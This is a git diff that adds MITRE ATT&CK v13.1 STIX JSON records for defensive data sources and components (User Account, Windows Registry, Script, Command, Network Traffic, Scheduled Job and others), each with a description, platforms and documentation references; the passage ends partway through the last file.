@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--a6862587-b2d5-4a5f-b787-4f2b460fbc08", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Modification", + "description": "Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json new file mode 100644 index 0000000000000000000000000000000000000000..efacd6350f2b632a991233e7496af5432c39fcbc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--13fece6d-e3b4-4467-af6f-11db18f5308d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:50:43.993Z", + "name": "User Account", + "description": "A profile representing a user, device, service, or application used to authenticate and access resources", + "x_mitre_platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0002", + "external_id": "DS0002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json new file mode 100644 index 0000000000000000000000000000000000000000..c2a5bebc0d97bdce8bc183fbf6480017d9db44f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--5e486f5f-2ecf-4b99-8eea-e85323751459", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0024", + "external_id": "DS0024" + }, + { + "source_name": "Microsoft Registry", + "description": "Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Windows Registry", + "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json new file mode 100644 index 0000000000000000000000000000000000000000..0811d7c1b72ed22afbc215d1b5e16515da41ec40 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json 
@@ -0,0 +1,58 @@
+{
+ "type": "bundle",
+ "id": "bundle--965ec4a7-fedc-43b2-8819-a6b84f3aa5d2",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-12-07T19:50:56.964Z",
+ "name": "Script",
+ "description": "A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0012",
+ "external_id": "DS0012"
+ },
+ {
+ "source_name": "FireEye PowerShell Logging",
+ "description": "Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html"
+ },
+ {
+ "source_name": "Microsoft AMSI",
+ "description": "Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal"
+ },
+ {
+ "source_name": "Microsoft PowerShell Logging",
+ "description": "Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552.json
new file mode 100644
index 0000000000000000000000000000000000000000..60b2b7913af52acb0b22f4549753fc05feef3794
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--7031653e-4ffd-4627-88a4-398dc885b3aa",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-24T19:14:55.615Z",
+ "name": "Operational Databases",
+ "description": "Operational databases contain information about the status of the operational process and associated devices, including any measurements, events, history, or alarms that have occurred",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552",
+ "created": "2022-05-11T16:22:58.802Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0040",
+ "external_id": "DS0040"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json
new file mode 100644
index 0000000000000000000000000000000000000000..1281318398c1ddc9133950f52375493ac4e6efa2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json
@@ -0,0 +1,51 @@
+{
+ "type": "bundle",
+ "id": "bundle--a0bf7bb6-4c80-44f6-ab65-088d62ba6fd2",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Google Workspace",
+ "IaaS",
+ "Linux",
+ "Office 365",
+ "SaaS",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "ics-attack"
+ ],
+ "x_mitre_collection_layers": [
+ "Cloud Control Plane",
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0015",
+ "external_id": "DS0015"
+ },
+ {
+ "source_name": "Confluence Logs",
+ "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.",
+ "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html"
+ }
+ ],
+ "modified": "2022-05-11T14:00:00.188Z",
+ "name": "Application Log",
+ "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json
new file mode 100644
index 0000000000000000000000000000000000000000..9ad8955c0b841758f535fc43491a7da4e9d88c3a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json
@@ -0,0 +1,57 @@
+{
+ "type": "bundle",
+ "id": "bundle--a8da672f-b2bc-4c43-aa56-fbcc139d6970",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-12-07T19:45:09.019Z",
+ "name": "Logon Session",
+ "description": "Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)",
+ "x_mitre_platforms": [
+ "Azure AD",
+ "Google Workspace",
+ "IaaS",
+ "Linux",
+ "Office 365",
+ "SaaS",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Cloud Control Plane",
+ "Host",
+ "Network"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0028",
+ "external_id": "DS0028"
+ },
+ {
+ "source_name": "Microsoft Audit Logon Events",
+ "description": "Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json
new file mode 100644
index 0000000000000000000000000000000000000000..379cb06874292580de451d90df2e6a23c7af66b9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json
@@ -0,0 +1,51 @@
+{
+ "type": "bundle",
+ "id": "bundle--c4ffd5ce-2749-4629-8aa3-4f2e519b4894",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-12-07T19:35:34.863Z",
+ "name": "File",
+ "description": "A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)",
+ "x_mitre_platforms": [
+ "Linux",
+ "Network",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0022",
+ "external_id": "DS0022"
+ },
+ {
+ "source_name": "Microsoft File Mgmt",
+ "description": "Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json
new file mode 100644
index 0000000000000000000000000000000000000000..a5dad376d22086a1ddb642b0c980bc2d5cc3f412
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json
@@ -0,0 +1,48 @@
+{
+ "type": "bundle",
+ "id": "bundle--def7474c-80e7-4d88-bde9-bbbe393a65ec",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0016",
+ "external_id": "DS0016"
+ },
+ {
+ "source_name": "Sysmon EID 9",
+ "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.",
+ "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread"
+ }
+ ],
+ "modified": "2022-03-30T14:26:51.804Z",
+ "name": "Drive",
+ "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json
new file mode 100644
index 0000000000000000000000000000000000000000..42598d9b1cb9284ff9d75c0d44f09629b1ee80c8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json
@@ -0,0 +1,62 @@
+{
+ "type": "bundle",
+ "id": "bundle--f497553d-652a-460e-bd3e-73e50531d6b0",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-04-20T18:38:00.625Z",
+ "name": "Command",
+ "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)",
+ "x_mitre_platforms": [
+ "Containers",
+ "Linux",
+ "Network",
+ "Windows",
+ "macOS",
+ "Android",
+ "iOS"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "mobile-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)",
+ "Austin Clark, @c2defense"
+ ],
+ "x_mitre_collection_layers": [
+ "Container",
+ "Host"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0017",
+ "external_id": "DS0017"
+ },
+ {
+ "source_name": "Confluence Linux Command Line",
+ "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.",
+ "url": "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html"
+ },
+ {
+ "source_name": "Audit OSX",
+ "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.",
+ "url": "https://www.scip.ch/en/?labs.20150108"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c.json
new file mode 100644
index 0000000000000000000000000000000000000000..991c501465a1c8a1850864e2e436f4405762034a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--843d91ca-7c7c-4c38-ba65-a8c30760953e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-24T19:14:15.637Z",
+ "name": "Asset",
+ "description": "Data sources with information about the set of devices found within the network, along with their current software and configurations",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c",
+ "created": "2022-05-11T16:22:58.802Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0039",
+ "external_id": "DS0039"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json
new file mode 100644
index 0000000000000000000000000000000000000000..9543dd4dc7a701966c936e4448a31a7e9f5cb816
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json
@@ -0,0 +1,48 @@
+{
+ "type": "bundle",
+ "id": "bundle--1051a64e-571b-41cd-9469-ed258ead8d1a",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0033",
+ "external_id": "DS0033"
+ },
+ {
+ "source_name": "Microsoft NFS Overview",
+ "description": "Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview"
+ }
+ ],
+ "modified": "2022-03-30T14:26:51.806Z",
+ "name": "Network Share",
+ "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json
new file mode 100644
index 0000000000000000000000000000000000000000..1e0d731d0f1ea0a1757fe8981eb9655553e07928
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json
@@ -0,0 +1,52 @@
+{
+ "type": "bundle",
+ "id": "bundle--328f0122-e87c-46b8-8346-5f56ca01a1dc",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-04-20T18:38:13.356Z",
+ "name": "Network Traffic",
+ "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)",
+ "x_mitre_platforms": [
+ "IaaS",
+ "Linux",
+ "Windows",
+ "macOS",
+ "Android",
+ "iOS"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "mobile-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)",
+ "ExtraHop"
+ ],
+ "x_mitre_collection_layers": [
+ "Cloud Control Plane",
+ "Host",
+ "Network"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0029",
+ "external_id": "DS0029"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json
new file mode 100644
index 0000000000000000000000000000000000000000..705c719c584ae0e72cf17af8f9c025f2c019eb3e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json
@@ -0,0 +1,50 @@
+{
+ "type": "bundle",
+ "id": "bundle--aea1c361-00c0-4ac9-8f01-2fe5084dc883",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Containers",
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Container",
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0003",
+ "external_id": "DS0003"
+ },
+ {
+ "source_name": "Microsoft Tasks",
+ "description": "Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks"
+ }
+ ],
+ "modified": "2022-03-30T14:26:51.806Z",
+ "name": "Scheduled Job",
+ "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)",
+ "x_mitre_version": "1.0",
